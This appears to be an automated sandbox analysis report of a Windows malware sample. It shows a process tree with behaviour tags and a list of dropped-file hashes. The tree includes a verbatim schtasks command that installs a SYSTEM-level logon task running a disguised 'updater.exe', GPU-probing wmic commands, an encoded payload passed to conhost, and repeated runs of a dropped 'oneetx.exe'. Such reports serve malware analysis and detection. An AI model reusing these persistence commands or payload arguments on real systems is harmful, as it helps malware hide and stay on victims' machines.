C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1720
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2096 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2924
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4788A320-6D05-41E4-AF6A-022175BC5A1C} S-1-5-21-1024678951-1535676557-2778719785-1000:KDGGTDCU\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe2⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe2⤵
- Executes dropped EXE
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe2⤵
- Executes dropped EXE
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe2⤵
- Executes dropped EXE
PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe2⤵
- Executes dropped EXE
PID:1292
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5D7D9889-C96C-4271-8430-8E142153F39E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:1808 -
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
1.3MB
MD510895d6584cb9877b3d5692e9e4eb494
SHA15983fb074e4a1d8d3c5a5e6bce814edc5dcb30bf
SHA256ece2262b3b1a60823bf144d2dc2160313eb67576097fb2417f67504394b73d66
SHA5123210294b2d3cabb64ecd5291aa85dcc6ef2eac45cbcddaf7f3aa3d155b7495716f67d619c3461ff45f21f3c2157167456335506e9af7b55d11c84d3deb83837d
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f52e5a4dd6e78a1a595547fbf52c102d
SHA19b55f6ade0f1d2f6da52b39b7de20296326eb162
SHA25683326e1c916a1834b15e49d03fbb45f169c8364cd9ed9f3148d99621aa366ffd
SHA512370beddd4169233af646c559be1a8a915b7919ee124b4612110f69b945204608fff5d31a0247f8524f245164dc30affa8410478607cae8112150f511614a537f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f52e5a4dd6e78a1a595547fbf52c102d
SHA19b55f6ade0f1d2f6da52b39b7de20296326eb162
SHA25683326e1c916a1834b15e49d03fbb45f169c8364cd9ed9f3148d99621aa366ffd
SHA512370beddd4169233af646c559be1a8a915b7919ee124b4612110f69b945204608fff5d31a0247f8524f245164dc30affa8410478607cae8112150f511614a537f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IXYY9F2YK7Y5OGL65A89.temp
Filesize7KB
MD5f52e5a4dd6e78a1a595547fbf52c102d
SHA19b55f6ade0f1d2f6da52b39b7de20296326eb162
SHA25683326e1c916a1834b15e49d03fbb45f169c8364cd9ed9f3148d99621aa366ffd
SHA512370beddd4169233af646c559be1a8a915b7919ee124b4612110f69b945204608fff5d31a0247f8524f245164dc30affa8410478607cae8112150f511614a537f
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
1.3MB
MD510895d6584cb9877b3d5692e9e4eb494
SHA15983fb074e4a1d8d3c5a5e6bce814edc5dcb30bf
SHA256ece2262b3b1a60823bf144d2dc2160313eb67576097fb2417f67504394b73d66
SHA5123210294b2d3cabb64ecd5291aa85dcc6ef2eac45cbcddaf7f3aa3d155b7495716f67d619c3461ff45f21f3c2157167456335506e9af7b55d11c84d3deb83837d
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474